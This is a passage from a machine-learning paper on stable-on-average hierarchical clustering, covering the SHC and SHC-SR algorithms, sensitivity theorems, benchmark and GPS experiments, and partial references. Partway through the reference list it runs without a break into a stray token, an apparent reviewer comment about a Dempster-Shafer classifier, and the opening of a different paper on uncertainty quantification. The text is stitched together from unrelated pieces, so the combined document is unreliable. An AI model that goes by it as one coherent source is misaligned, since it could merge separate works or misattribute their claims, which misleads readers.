Let \( \text{root}(T) \) denote the root node of \( T \). In this work, we mostly consider binary trees and let \( \text{left}(T) \) and \( \text{right}(T) \) denote the left and right subtrees of \( \text{root}(T) \), respectively. If \( \text{root}(T) \) is the only node in \( T \), then we call \( T \) a singleton, and we define \( \text{left}(T) = \text{right}(T) = \emptyset \). We also set \( \text{left}(T) = \text{right}(T) = \emptyset \) when \( T \) is an empty tree. Let \( \text{leaves}(T) \subseteq 2^X \) denote the leaves of \( T \).

3.2 Graph-Theoretic Notions

For a finite set \( V \), we denote by \( \binom{V}{2} \) the set of pairs of elements in \( V \). For a set \( V \) and \( i \in V \), we sometimes write \( V - i \) to denote \( V \setminus \{i\} \). Let \( G = (V, E) \) be a graph. For a vertex \( i \in V \), let \( G - i \) denote the graph obtained from \( G \) by deleting \( i \) and the edges incident to \( i \). For a vertex set \( S \subseteq V \), let \( G[S] \) denote the subgraph of \( G \) induced by \( S \). Let \( G = (V, E, w) \) be a weighted graph, where \( w : E \rightarrow \mathbb{R}_+ \) is a weight function over edges. For disjoint sets of vertices \( S, T \subseteq V \), let \( c_G(S, T) \) denote the total weight of edges between \( S \) and \( T \), that is, \( \sum_{i \in S, j \in T} w(i, j) \). We denote by \( \phi_G(S) \) the sparsity of \( S \), that is, \( c_G(S, V \setminus S)/(|S| \cdot |V \setminus S|) \).

3.3 Exponential Mechanism

The exponential mechanism (McSherry and Talwar, 2007) is an algorithm that, given a vector \( x \in \mathbb{R}^n \) and a real number \( \lambda > 0 \), returns an index \( i \in [n] \) with probability proportional to \( e^{-\lambda x_i} \). The following fact is useful for designing algorithms with low average sensitivity.

**Lemma 3.1** (McSherry and Talwar (2007)). Let \( \lambda > 0 \) and let \( A \) be the algorithm that, given a vector \( x \in \mathbb{R}^n \), applies the exponential mechanism to \( x \) and \( \lambda \). Then for any \( t > 0 \), we have

\[ \Pr_{i \sim A(x)} \left[ x_i \geq \text{OPT} + \frac{\log n}{\lambda} + \frac{t}{\lambda} \right] \leq e^{-t}, \]

where \( \text{OPT} = \min_{i \in [n]} x_i \). Moreover, for \( x' \in \mathbb{R}^n \), we have

\[ d_{TV}(A(x), A(x')) = O(\lambda \cdot \|x - x'\|_1). \]

4 Average Sensitivity of Hierarchical Clustering

In this section, we formally define the average sensitivity of a hierarchical clustering algorithm.

4.1 Distance between Hierarchical Clusterings

First, we define the distance between hierarchical clusterings. Let \( X = \{x_1, \ldots, x_n\} \) be a dataset, \( x \in X \) be a data point, and \( T \) and \( T' \) be hierarchical clusterings over \( X \) and \( X \setminus \{x\} \), respectively. Then, the distance \( d_x(T, T') \) between \( T \) and \( T' \) is defined recursively as follows. If both \( T \) and \( T' \) are empty trees, then \( d_x(T, T') \) is defined to be zero. Otherwise, we incur the cost of one if

\[ \text{leaves(left}(T)) \triangle \text{leaves(left}(T')) \not\subseteq \{x\}, \quad \text{or} \quad \text{leaves(right}(T)) \triangle \text{leaves(right}(T')) \not\subseteq \{x\}. \]

In words, we incur the cost of one if the left subtrees or the right subtrees differ except for the ignored element \( x \in X \). Then, we recursively compute the costs \( d_x(\text{left}(T), \text{left}(T')) \) and \( d_x(\text{right}(T), \text{right}(T')) \) and add them up. The details are given in Algorithm 1.
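A runnable Python rendering of this recursion (formalized as Algorithm 1 below) might look as follows. Here a hierarchical clustering is encoded as nested pairs with frozensets of data points at the leaves, and leaves(T) is flattened to the set of points it covers; this encoding is our own choice for illustration.

```python
def leaves(T):
    """Return the set of data points covered by the leaves of T (None = empty tree)."""
    if T is None:
        return frozenset()
    if isinstance(T, frozenset):          # a leaf: a subset of the dataset
        return T
    return leaves(T[0]) | leaves(T[1])

def d_x(T, Tp, x):
    """Distance between clusterings over X and X minus {x}, following Algorithm 1."""
    if T is None and Tp is None:
        return 0
    def left(t):  return None if t is None or isinstance(t, frozenset) else t[0]
    def right(t): return None if t is None or isinstance(t, frozenset) else t[1]
    # cost 1 if the left or right subtrees differ, except for the ignored point x
    dl = leaves(left(T)) ^ leaves(left(Tp))
    dr = leaves(right(T)) ^ leaves(right(Tp))
    c = 0 if dl <= {x} and dr <= {x} else 1
    return c + d_x(left(T), left(Tp), x) + d_x(right(T), right(Tp), x)

T  = (frozenset({1, 2}), (frozenset({3}), frozenset({4, 5})))
Tp = (frozenset({1, 2}), (frozenset({3}), frozenset({5})))
print(d_x(T, Tp, 4))   # 0: the hierarchies agree up to the deleted point 4
```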
It is easy to verify that \( d_x \) satisfies the triangle inequality. Also, note that \( d_x(T, T') \leq |T| + |T'| \), where \( |T| \) is the number of nodes in \( T \) (including the leaves). **Algorithm 1:** Distance between trees ``` Procedure \( d_x(T, T') \) if \( T = T' = \emptyset \) then return 0; if \( \text{leaves(left}(T)) \triangle \text{leaves(left}(T')) \not\subseteq \{x\} \) or \( \text{leaves(right}(T)) \triangle \text{leaves(right}(T')) \not\subseteq \{x\} \) then \( c \leftarrow 1 \). else \( c \leftarrow 0 \). return \( c + d_x(\text{left}(T), \text{left}(T')) + d_x(\text{right}(T), \text{right}(T')) \). ``` 4.2 Average Sensitivity Now we define the average sensitivity of a deterministic algorithm as follows: **Definition 4.1** (Varma and Yoshida (2021)). Let \( A \) be a deterministic algorithm that, given a dataset \( X = \{x_1, \ldots, x_n\} \), outputs a hierarchical clustering. Then, the average sensitivity of \( A \) on a dataset \( X = \{x_1, \ldots, x_n\} \) is \[ \frac{1}{n} \sum_{x \in X} d_x(A(X), A(X \setminus \{x\})). \] (1) To extend the definition to randomized algorithms, we define \( \text{EM}_x \) as the earth mover’s distance between two distributions with the underlying distance \( d_x \). Specifically, for distributions over hierarchical clusterings \( T \) and \( T' \), we define \( \text{EM}_x(T, T') = \min_D E_{(T,T') \sim D} d_x(T, T') \), where \( D \) runs over distributions over pairs of hierarchical clusterings such that the marginal distributions on the first and second coordinates are equal to \( T \) and \( T' \), respectively (sometimes called a coupling between \( T \) and \( T' \) in the literature). Then, we define the average sensitivity of a randomized algorithm as follows: Definition 4.2 (Varma and Yoshida (2021)). Let $A$ be a randomized algorithm that, given a dataset $X = \{x_1, \ldots, x_n\}$, outputs a hierarchical clustering. Then, the average sensitivity of $A$ on a dataset $X = \{x_1, \ldots, x_n\}$ is $$\frac{1}{n} \sum_{x \in X} \text{EM}_x(A(X), A(X \setminus \{x\})).$$ Note that this definition coincides with the one for deterministic algorithms when the algorithm is deterministic. Sometimes we want to guarantee that a randomized algorithm $A$ outputs similar hierarchical clusterings on $X$ and $X \setminus \{x\}$ when we use the same random coins. For a bit string $\pi$, let $A_\pi$ denote the deterministic algorithm obtained from $A$ by fixing the outcomes of its random coins to $\pi$. Then, we define the following variant of average sensitivity. Definition 4.3. Let $A$ be a randomized algorithm that, given a dataset $X = \{x_1, \ldots, x_n\}$, outputs a hierarchical clustering. Then, the average sensitivity of $A$ under shared randomness on a dataset $X = \{x_1, \ldots, x_n\}$ is $$E_\pi \left[ \frac{1}{n} \sum_{x \in X} d_x(A_\pi(X), A_\pi(X \setminus \{x\})) \right].$$ 5 STABLE-ON-AVERAGE HIERARCHICAL CLUSTERING 5.1 ALGORITHM DESCRIPTION In this section, we describe our algorithm for hierarchical clustering with low average sensitivity, and then derive some theoretical properties. In Section 6, we consider another algorithm with low average sensitivity under shared randomness. Our algorithm, SHC (Stable Hierarchical Clustering), is given in Algorithm 2. 
Given a dataset \( X = \{x_1, \ldots, x_n\} \) and a parameter \( \alpha > 0 \), we first transform \( X \) into a weighted graph \( G = (V, E, w) \), where \( V = \{1, 2, \ldots, n\} \), \( E = \binom{V}{2} \), and \( w(i, j) = \exp(-\alpha \|x_i - x_j\|^2) \), and then pass \( G \) to a subroutine REC, which constructs a hierarchical clustering using \( G \). Note that closer data point pairs get higher weights under \( w \). If \( \alpha \) is small, then every data point pair gets an almost identical weight, and if \( \alpha \) is large, then distant data point pairs get negligible weights and will be ignored in the hierarchical clustering.

The subroutine REC is recursive. Given a weighted graph \( G = (V, E, w) \) and a depth limit \( D \geq 0 \), we split the vertex set into two components using a subroutine SSC (Stable Sparse Cut, Algorithm 3), and then recursively process them until the depth reaches \( D \).

Now we explain the details of the subroutine SSC. Ideally, we want to solve the sparsest cut problem, for which the goal is to compute \( S \subseteq V \) that minimizes \( \phi_G(S) \). However, approximating \( \phi_G(S) \) to within a constant factor is NP-hard (Chawla et al., 2006), and although some polynomial-time approximation algorithms are known (Arora et al., 2009; Leighton and Rao, 1999), they are slow in practice because they internally solve LPs or SDPs, and it is not clear whether they are stable. Hence, we take a different approach. Our idea is to select a pair of vertices, called centroids, and then assign every other vertex to the more similar centroid to form a partition into two components. To achieve a small average sensitivity, we select the pair of centroids as follows. For \( \{i, j\} \in \binom{V}{2} \) with \( i < j \), let \( S_{ij} = \{k \in V : w(i, k) > w(j, k)\} \) be the set of vertices that are more similar to \( i \) than to \( j \), and define \( \phi_G(i, j) = \phi_G(S_{ij}) \). Then, we sample a pair of centroids \( \{i, j\} \) using the exponential mechanism with the cost function \( \phi_G(\cdot, \cdot) \) and the given parameter \( \lambda \). When \( \lambda = 0 \), the exponential mechanism returns \( \{i, j\} \) sampled uniformly from \( \binom{V}{2} \), and when \( \lambda = \infty \), it returns the \( \{i, j\} \) that minimizes \( \phi_G(i, j) \).

### 5.2 Theoretical Properties

The time complexity of SHC is easy to analyze:

**Theorem 5.1.** The time complexity of SHC is \( O(Dn^3) \).

Next, we discuss the approximation guarantee and (a variant of) the average sensitivity of SSC. For a weighted graph \( G = (V, E, w) \), we define

\[ \phi^*_G = \min_{\{i, j\} \in \binom{V}{2}} \phi_G(S_{ij}). \]

Note that \( \phi^*_G \) is not the minimum sparsity of a set in \( G \), i.e., \( \min_{S \subseteq V} \phi_G(S) \). Let \( w_G \) denote the total edge weight, that is, \( \sum_{\{i, j\} \in \binom{V}{2}} w(i, j) \). The following holds:

**Theorem 5.2.** For a weighted graph \( G \) of \( n \) vertices and \( \lambda > 0 \), let \( S = \text{SSC}(G, \lambda) \). Then, we have

\[ E[\phi_G(S)] \leq \phi^*_G + O\left( \frac{\log(\lambda w_G)}{\lambda} \right). \]

We also have

\[ \frac{1}{n} \sum_{k \in V} d_{TV}(\text{SSC}(G, \lambda), \text{SSC}(G - k, \lambda)) = O\left( \frac{1}{n} (\lambda \phi^*_G + \log(nw_G)) \right). \]
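To illustrate SSC, here is a small NumPy sketch of the centroid-pair selection just described. It assumes `W` is the symmetric weight matrix of \( G \) with unit self-similarity on the diagonal (so that each centroid falls on its own side of the cut) and `lam` plays the role of \( \lambda \); degenerate cuts with empty \( S_{ij} \) are skipped, a corner case the pseudocode leaves implicit.

```python
import numpy as np
from itertools import combinations

def ssc(W, lam, rng=None):
    """Sample S_ij with probability proportional to exp(-lam * phi_G(S_ij))."""
    rng = np.random.default_rng() if rng is None else rng
    n = W.shape[0]
    cuts, costs = [], []
    for i, j in combinations(range(n), 2):
        S = np.flatnonzero(W[i] > W[j])          # vertices more similar to i than to j
        if 0 < len(S) < n:                       # skip degenerate partitions
            mask = np.zeros(n, dtype=bool)
            mask[S] = True
            cut_weight = W[mask][:, ~mask].sum() # c_G(S, V \ S)
            cuts.append(S)
            costs.append(cut_weight / (len(S) * (n - len(S))))
    logits = -lam * np.asarray(costs)
    p = np.exp(logits - logits.max())            # exponential mechanism
    p /= p.sum()
    return cuts[rng.choice(len(cuts), p=p)]
```

Setting `lam = 0` recovers a uniformly random pair, while very large `lam` concentrates the distribution on the sparsest cut, matching the two extreme cases described above.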
Because the weight function \( w \) is \([0, 1]\)-valued, we have \( \phi^*_G = O(1) \) and \( w_G = O(n^2) \). Then, for \( \epsilon > 0 \), we obtain \( E[\phi_G(S)] \leq (1 + \epsilon)\phi^*_G \) by setting \( \lambda = \Theta(\log n / (\epsilon \phi^*_G)) \). For this particular choice of \( \lambda \), the average total variation distance is \( O(\log n / (\epsilon n)) \), which is quite small.

Finally, we discuss the average sensitivity of SHC.

**Theorem 5.3.** The average sensitivity of \( \text{SHC}(X, \alpha, \lambda, D) \) is \( O(D(\lambda w_G/n + \log(nw_G))) \), where \( G \) is the graph constructed from \( X \) and \( \alpha \) in SHC.

Recalling that \( w_G = O(n^2) \), the bound is roughly \( O(\lambda Dn) \), which can be made small by setting \( \lambda \ll 1 \).

### 6 Stable-on-Average Hierarchical Clustering under Shared Randomness

In this section, we propose an algorithm SHC-SR by modifying SHC (Algorithm 2) so that it has a small average sensitivity under shared randomness. First, we design a randomized algorithm called SAMPLING that, given a vector \( p \in \mathbb{R}_+^n \) with \( \sum_{i=1}^n p_i = 1 \) and a random bit string \( \pi \), outputs \( i \in \{1, \ldots, n\} \) with probability \( p_i \), such that perturbing the vector \( p \) does not change the output with high probability over \( \pi \). For a set \( S \), let \( U(S, \pi) \) denote a procedure that outputs an element \( i \in S \) such that \( U(S, \pi) \), for a random bit string \( \pi \), yields the uniform distribution over \( S \). Such a procedure can be easily implemented by taking the first few bits from \( \pi \) and then mapping them to an element of \( S \). In \( \text{SAMPLING}(p, \pi) \), we first compute a permutation \( \sigma \) such that \( p_{\sigma(1)} \leq \cdots \leq p_{\sigma(n)} \) and a carefully designed vector \( q \in [0, 1]^n \) from \( p \) and \( \sigma \). Then, we sample \( t \in [0, 1] \) uniformly at random and repeatedly sample \( i \in \{1, \ldots, n\} \) uniformly at random until \( q_i > t \), in which case we return \( i \). The vector \( q \) is designed so that this process outputs \( i \) with probability \( p_i \). The details are given in Algorithm 4.

Because the only randomized process in SHC is the exponential mechanism used in SSC (Algorithm 3), by replacing it with SAMPLING, which simulates the exponential mechanism, we obtain a hierarchical clustering algorithm SHC-SR with low average sensitivity under shared randomness:

**Theorem 6.1.** There exists an algorithm SHC-SR that, given a dataset \( X = (x_1, \ldots, x_n) \), \( \alpha \geq 0 \), \( \lambda \geq 0 \), an integer \( D \), and a bit string \( \pi \), outputs a hierarchical clustering over \( X \) such that

- the distribution of SHC-SR\((X, \alpha, \lambda, D, \pi)\) over random bits \( \pi \) is equal to that of SHC\((X, \alpha, \lambda, D)\);
- the average sensitivity of SHC-SR\((X, \alpha, \lambda, D, \pi)\) under shared randomness is \( O(D(\lambda w_G/n + \log(nw_G))) \), where \( G \) is the graph constructed from \( X \) and \( \alpha \) as in SHC.

### 7 EXPERIMENTS

We demonstrate that the proposed SHC-SR (Section 6) can output stable hierarchical clusterings on several benchmark datasets. For all the experiments, we used a workstation with 48 cores of AMD EPYC processors and 256 GB of RAM.

#### 7.1 SETUPS

**Datasets** We took the three datasets shown in Table 1 from sklearn.datasets. For the experiments, we subsampled a fraction of the data points from each dataset so that we could assess the effect of the data size \( n \).

**Hierarchical Clustering Algorithms** In the experiments, we implemented SHC-SR as given in Theorem 6.1.
We constructed weighted graphs by setting \( w(i,j) = \exp(-\alpha \|x_i - x_j\|^2/m) \), with \( m \) being the median of all pairwise distances, and varied \( \alpha \) over several values. We also varied the parameter \( \lambda \) used in SSC-SR. The case \( \lambda = \infty \) corresponds to a greedy algorithm that selects the pair \((i,j)\) with the smallest \( \phi_G(i,j) \) in SSC-SR (Algorithm 3 with the exponential mechanism implemented via SAMPLING), and the case \( \lambda = 0 \) corresponds to an algorithm that selects the pair \((i,j)\) uniformly at random in SSC-SR. We implemented SHC-SR in Python 3 using the JIT compiler of Numba.

We adopted several standard hierarchical clustering algorithms as baseline methods for comparison. As typical agglomerative clustering algorithms, we adopted the four algorithms implemented in AgglomerativeClustering in scikit-learn with four different linkage criteria: ward, average, complete, and single, with the other options set to their defaults. We note that Balcan et al. (2014) reported that ward tends to be robust against outlier injections and noise contamination. As representatives of divisive clustering, we adopted bisecting 2-means (Jain, 2010) and principal direction divisive partitioning (Boley, 1998). These two methods recursively split data points by using the standard 2-means clustering and the sign of the first principal component, respectively. We implemented these methods, which we denote by 2-means and pcd, by using KMeans in scikit-learn with the number of clusters set to two and ten random initializations, and PCA with the number of components set to one, respectively, with default parameters for the other options.¹

---

¹We did not adopt the outlier-robust methods (Eriksson et al., 2011; Balcan et al., 2014; Cheng et al., 2019) because the core of these methods is identifying outliers, which is irrelevant to the current problem.

---

**Table 1: Datasets**

| Dataset | Data Size | # of Features |
|---------------|-----------|---------------|
| breast cancer | 569 | 30 |
| diabetes | 442 | 10 |
| digits | 1797 | 64 |

**Algorithm 4:** Sampling with a low average sensitivity under shared randomness

```
Procedure SAMPLING(p, π)
    Let σ be a permutation such that \( p_{σ(1)} \leq p_{σ(2)} \leq \cdots \leq p_{σ(n)} \);
    Let \( q \in \mathbb{R}_+^n \) be such that \( q_{σ(i)} = q_{σ(i-1)} + (n-i+1)(p_{σ(i)} - p_{σ(i-1)}) \), where \( p_{σ(0)} = q_{σ(0)} = 0 \);
    \( t \leftarrow U([0, 1], π) \) and delete the used bits from \( π \);
    while true do
        \( i \leftarrow U(\{1, 2, \ldots, n\}, π) \) and delete the used bits from \( π \);
        if \( q_i > t \) then break.
    return \( i \).
```
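Below is a direct Python rendering of Algorithm 4. The shared random bit string π is modeled by an explicitly seeded generator, so rerunning with the same seed on a slightly perturbed p reproduces the same draws, which is exactly the shared-randomness behavior the algorithm is designed for; the function name and the rng choice are ours.

```python
import numpy as np

def sampling(p, rng):
    """Output i with probability p[i], stably under shared randomness."""
    p = np.asarray(p, dtype=float)
    n = len(p)
    order = np.argsort(p)                    # permutation sigma (ascending p)
    q = np.empty(n)
    prev_p = prev_q = 0.0
    for rank, idx in enumerate(order):       # rank 0 corresponds to sigma(1)
        prev_q = prev_q + (n - rank) * (p[idx] - prev_p)
        q[idx] = prev_q
        prev_p = p[idx]
    t = rng.random()                         # t ~ U([0, 1])
    while True:
        i = rng.integers(n)                  # i ~ U({1, ..., n})
        if q[i] > t:
            return i

rng = np.random.default_rng(0)               # the fixed seed plays the role of pi
print(sampling([0.1, 0.2, 0.7], rng))        # returns index 2 with probability 0.7
```

Note that \( q_{\sigma(n)} \) telescopes to \( \sum_i p_i = 1 \), so the rejection loop terminates with probability one.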
**Evaluation criteria** We measure the average sensitivity of hierarchical clustering algorithms as well as their qualities. We evaluated the average sensitivity following the definitions in Section 4. For SHC-SR, we treated SHC-SR(·, α, λ, D, π) with a fixed π as the deterministic algorithm \( A \). As the quality measure, we adopted three popular criteria: the Dasgupta score (Dasgupta, 2016), dendrogram purity (Heller and Ghahramani, 2005), and cophenetic correlation (Sokal and Rohlf, 1962).² The Dasgupta score measures the quality of a hierarchical clustering \( T \) using costs of pairs of data points. More specifically, we define the Dasgupta score of a hierarchical clustering \( T \) by

\[ \text{score}(T) = \sum_{i \neq j} w(i, j)\, n(i, j), \]

where \( n(i, j) \) denotes the number of data points belonging to the subtree rooted at the lowest common ancestor of the leaves that \( x_i \) and \( x_j \) belong to. The Dasgupta score is small when dissimilar points \( x_i \) and \( x_j \) (i.e., \( w(i, j) \) is small) are split into different clusters in a shallow part of the tree, and similar points (i.e., \( w(i, j) \) is large) are split in a deeper part. Thus, a clustering \( T \) with smaller \( \text{score}(T) \) is considered ideal.

**Procedure** We generated 10 subsampled datasets of size \( n = 100, 300, \) and 500 from the original dataset.³ For each subsampled dataset, we constructed a hierarchical clustering using SHC-SR over different values of \( \lambda \) and the baseline methods. As a result, we obtained 10 clusterings for each method. We then report the trade-offs between the average of the average sensitivity and the average of the clustering qualities over these 10 clusterings.

7.2 Results

Figure 2 shows the results of the experiments with \( n = 100 \). Each figure shows the trade-offs between the average sensitivity and the average Dasgupta score, with the depth of \( T \) limited to 10 and with the similarity coefficient \( \alpha \) varied over 1, 3, 10, and 30. The results of the baselines and of SHC-SR for several different \( \lambda \) are shown as different symbols and red lines, respectively. We find that the red lines of SHC-SR tend to lie in the lower left area of the figures. That is, SHC-SR with appropriately chosen \( \lambda \) can attain a good trade-off with small average sensitivity and better Dasgupta scores, as expected. By contrast, all the baselines, except for single, tend to exhibit small Dasgupta scores while incurring high average sensitivity. These methods are therefore good at producing high-quality clusterings while being sensitive to small perturbations of the dataset. The result of single is exceptional, exhibiting large Dasgupta scores with small average sensitivity. We observed that single tends to produce highly unbalanced clusterings because it splits the dataset into small and large clusters. Although such a split is less sensitive to dataset perturbations and has smaller average sensitivity, the quality of the clustering is poor. SHC-SR provides a way to balance the quality of the clustering and its average sensitivity by tuning \( \lambda \) upon the user's demand.

²We show the results for dendrogram purity and cophenetic correlation in Appendix.
³We show the results for \( n = 300 \) and \( n = 500 \) in Appendix because they are similar to \( n = 100 \).

8 APPLICATION TO GPS DATASET

We applied SHC-SR and agglomerative algorithms to a real-world problem involving a GPS dataset (Takahashi et al., 2019). This dataset consists of 280 GPS markers in Taiwan, where each data point represents its longitude, latitude, and velocity in the horizontal directions. By applying clustering to the horizontal velocities, we can cluster regions with similar movements and find active tectonic boundaries. The stability of clustering is crucial in this application because, if the found clusters change drastically upon removal of a few GPS markers, the clusters may be an artifact induced by unstable clustering algorithms rather than true tectonic boundaries. Figure 3 shows the clustering results on the GPS dataset over five trials in which 20 randomly chosen points out of the 280 are removed from the dataset. Here, we display the four clusters found at depth two of the obtained hierarchy.
The figures show that the agglomerative algorithms (ward, average, complete) tend to produce different clusters over different data removals. By contrast, SHC-SR with \( \lambda = 10 \), \( 1000 \), and \( \infty \) produces almost identical clusters, except for the first result with \( \lambda = 10 \). This result confirms that we can obtain stable clusters by using SHC-SR.

9 CONCLUSIONS

In this work, we considered the average sensitivity of hierarchical clustering. We proposed the hierarchical clustering algorithms SHC and SHC-SR and theoretically proved that they have low average sensitivity and low average sensitivity under shared randomness, respectively. Then, using real-world datasets, we empirically confirmed that our algorithm SHC-SR achieves a good trade-off between the quality of the output clustering and average sensitivity.

---

⁴We omitted single, 2-means, and pcd because of their poor performance in the previous experiments; single was poor in its clustering quality, 2-means was poor in its average sensitivity, and pcd tends to be Pareto-dominated by other methods.

REFERENCES

A. Abboud, V. Cohen-Addad, and H. Houdrougé. Subquadratic high-dimensional hierarchical clustering. In *Advances in Neural Information Processing Systems (NeurIPS)*, volume 32, 2019.

M. Ackerman and S. Ben-David. A characterization of linkage-based hierarchical clustering. *The Journal of Machine Learning Research*, 17(1):8182–8198, 2016.

M. Ackerman, S. Ben-David, S. Brânzei, and D. Loker. Weighted clustering. In *Proceedings of the AAAI Conference on Artificial Intelligence (AAAI)*, volume 26, pages 858–863, 2012.

S. Arora, S. Rao, and U. Vazirani. Expander flows, geometric embeddings and graph partitioning. *Journal of the ACM*, 56(2):1–37, 2009.

M.-F. Balcan, Y. Liang, and P. Gupta. Robust hierarchical clustering. *The Journal of Machine Learning Research*, 15(1):3831–3871, 2014.

D. Boley. Principal direction divisive partitioning. *Data Mining and Knowledge Discovery*, 2:325–344, 1998.

M. Charikar and V. Chatziafratis. Approximate hierarchical clustering via sparsest cut and spreading metrics. In *Proceedings of the 28th Annual ACM-SIAM Symposium on Discrete Algorithms (SODA)*, pages 841–854. SIAM, 2017.

S. Chawla, R. Krauthgamer, R. Kumar, Y. Rabani, and D. Sivakumar. On the hardness of approximating multicut and sparsest-cut. *Computational Complexity*, 15(2):94–114, 2006.

D. Cheng, Q. Zhu, J. Huang, Q. Wu, and L. Yang. A hierarchical clustering algorithm based on noise removal. *International Journal of Machine Learning and Cybernetics*, 10:1591–1602, 2019.

S. Dasgupta. A cost function for similarity-based hierarchical clustering. In *Proceedings of the 48th Annual ACM Symposium on Theory of Computing (STOC)*, pages 118–127, 2016.

L. Dhulipala, D. Eisenstat, J. Lacki, V. Mirrokni, and J. Shi. Hierarchical agglomerative graph clustering in poly-logarithmic depth. In *Advances in Neural Information Processing Systems (NeurIPS)*, pages 22925–22940, 2022.

M. B. Eisen, P. T. Spellman, P. O. Brown, and D. Botstein. Cluster analysis and display of genome-wide expression patterns. *Proceedings of the National Academy of Sciences*, 95(25):14863–14868, 1998.

B. Eriksson, G. Dasarathy, A. Singh, and R. Nowak. Active clustering: Robust and efficient hierarchical clustering using adaptively selected similarities. In *Proceedings of the 14th International Conference on Artificial Intelligence and Statistics (AISTATS)*, volume 15, pages 260–268, 2011.

L. L. Gao, J. Bien, and D. Witten. Selective inference for hierarchical clustering.
*Journal of the American Statistical Association*, pages 1–27, 2022. F. Gilbert, P. Simonetto, F. Zaidi, F. Jourdan, and R. Bourqui. Communities and hierarchical structures in dynamic social networks: analysis and visualization. *Social Network Analysis and Mining*, 1(2):83–95, 2011. S. Hara and Y. Yoshida. Average sensitivity of decision tree learning. In *Proceedings of the 11th International Conference on Learning Representations (ICLR)*, 2023. T. Hastie, R. Tibshirani, J. H. Friedman, and J. H. Friedman. *The elements of statistical learning: data mining, inference, and prediction*, volume 2. Springer, 2009. K. A. Heller and Z. Ghahramani. Bayesian hierarchical clustering. In *Proceedings of the 22nd International Conference on Machine learning (ICML)*, pages 297–304, 2005. A. K. Jain. Data clustering: 50 years beyond K-means. *Pattern Recognition Letters*, 31(8):651–666, 2010.
libLqoInAd
I'm a bit confused as to why the n-dim DS classifier handles epistemic uncertainty better than the softmax classifier, especially as demonstrated in Figure 3. As noted in the text, the n-dim classifier loses the ability to distinguish between aleatoric and epistemic uncertainty (since uncertainty is only able to be measured on the singletons, vs the larger sets). I understand that the softmax classifier would be at least a normalized version of this, but I'm not sure why it would completely switch its predictions in a way that assigns mass to a class completely ignored by the n-dim one (i.e., the {1} set).
Reliable Classifications with Guaranteed Confidence using the Dempster-Shafer Theory of Evidence

Anonymous authors
Paper under double-blind review

Abstract

Reliably capturing predictive uncertainty is indispensable for the deployment of machine learning (ML) models in safety-critical domains. The most commonly used approaches to uncertainty quantification are, however, either computationally costly at inference or incapable of capturing different types of uncertainty (i.e., aleatoric and epistemic). In this paper, we tackle this issue using the Dempster-Shafer theory of evidence, which only recently gained attention as a tool to estimate uncertainty in ML. By training a neural network to return a generalized probability measure and combining it with conformal prediction, we obtain set predictions with guaranteed user-specified confidence. We test our method on various datasets and empirically show that it reflects uncertainty more reliably than a calibrated classifier with softmax output, since our approach yields smaller and hence more informative prediction sets at the same bounded error level, in particular for samples with high epistemic uncertainty. In order to deal with the exponential scaling inherent to classifiers within Dempster-Shafer theory, we introduce a second approach with reduced complexity, which also returns smaller sets than the comparative method, even on large classification tasks with more than 40 distinct labels. Our results indicate that the proposed methods are promising approaches to obtain reliable and informative predictions in the presence of both aleatoric and epistemic uncertainty in only one forward-pass through the network.

1 Introduction

Both scientific and industrial challenges are increasingly addressed using machine learning (ML) methods. There is a growing tendency to employ ML even in scenarios where false predictions can have severe consequences, such as in medical diagnostics or autonomous driving. A major challenge for the development of ML functions in these kinds of applications is the reliability of the underlying model. Besides robustness of the ML module, having an estimate of the predictive uncertainty is an essential component. While common metrics such as accuracy indicate how good a model is on average, they do not provide information about how certain it is for a specific input example. For instance, a pedestrian in traffic most likely does not care that the autonomous driving module correctly classifies 99% of pedestrians if it fails to classify them and causes an accident. Needless to say, it is indispensable to have a measure of uncertainty for each instance that allows for making decisions that control instance-sensitive risk functions. In the instance of the pedestrian, this would, e.g., imply braking whenever the uncertainty of the class "pedestrian" is high.

In general, a distinction is drawn between two different sources of uncertainty, namely aleatoric and epistemic (Hüllermeier & Waegeman, 2021). Aleatoric uncertainty, sometimes also referred to as statistical uncertainty, is associated with an inherent random nature of the information. This includes, for instance, noisy or imprecise data. Epistemic uncertainty, in contrast, stems from a lack of information (ignorance) of the decision maker about the perfect model, which can occur in the ML context due to non-optimal training or because of an ill-chosen hypothesis space that does not include the perfect model.
More data, i.e., more information, can reduce parts of the epistemic uncertainty, but not the aleatoric uncertainty, which is why the latter is sometimes also referred to as irreducible uncertainty. Reliable ML methods ought to be capable of distinguishing between aleatoric and epistemic uncertainty for some applications. For example, in active learning the samples with high epistemic uncertainty are leveraged to reduce uncertainty in regions of the feature space in which the model lacks sufficient data (Aggarwal et al., 2014).

There are applications, such as autonomous driving, which require fast inference times, as latency in the vehicle should be low. At the same time, such low-latency applications may need to run on embedded devices, where computational resources are limited. Many common methods for quantifying aleatoric and epistemic uncertainty require sampling steps or utilize ensembles. For example, Bayesian neural networks sample from the posterior during inference, and an ensemble ML model can easily estimate uncertainty as the deviation of predictions between individual ensemble members, but multiplies the computational cost by the size of the ensemble. Thus, neither of these methods is suitable for a low-latency setting with limited computational resources. In conclusion, a method that is simultaneously able to estimate aleatoric and epistemic uncertainty while being computationally lean is so far lacking, and forms the starting point of our investigations.

Contributions. In this work, we introduce a novel approach to quantify predictive uncertainty that combines a neural network classifier based on the Dempster-Shafer theory of evidence (DST) (Dempster, 1967a,b; Shafer, 1976) with conformal prediction (CP) (Vovk et al., 2005; Papadopoulos et al., 2002; Lei & Wasserman, 2014), yielding reliable set predictions with guaranteed confidence for classification tasks subject to uncertainty in only one forward-pass through the network. Our approach can be adapted to arbitrary network architectures, only requiring an adjustment of the output layer to match the dimension of the quantities from DST. We construct a loss function that enables our classifier to be informative under different levels of epistemic uncertainty, and we show empirically on different datasets that our method returns smaller, i.e., more informative sets than a comparable standard classifier network using a softmax output. Further, we introduce a reduced approach limited to false-negative control that does not require an adaptation of the output dimension while still yielding informative set predictions.

2 RELATED WORK

In the field of uncertainty quantification in ML, various techniques have emerged to enhance the reliability and robustness of predictive models. This section reviews the state of the art in uncertainty quantification for single-label classification tasks (i.e., where each instance has only one correct label), discussing methods such as Bayesian neural networks (BNNs) (MacKay, 1992) or ensemble methods (Lakshminarayanan et al., 2017), and highlighting the recent use of the Dempster-Shafer theory in deep learning.

A naïve strategy for capturing predictive uncertainty is the probabilistic approach, which involves predicting the discrete probability distribution over the different outcomes. Depicted in a probability simplex, this would constitute a point prediction, see Fig. 1(a).
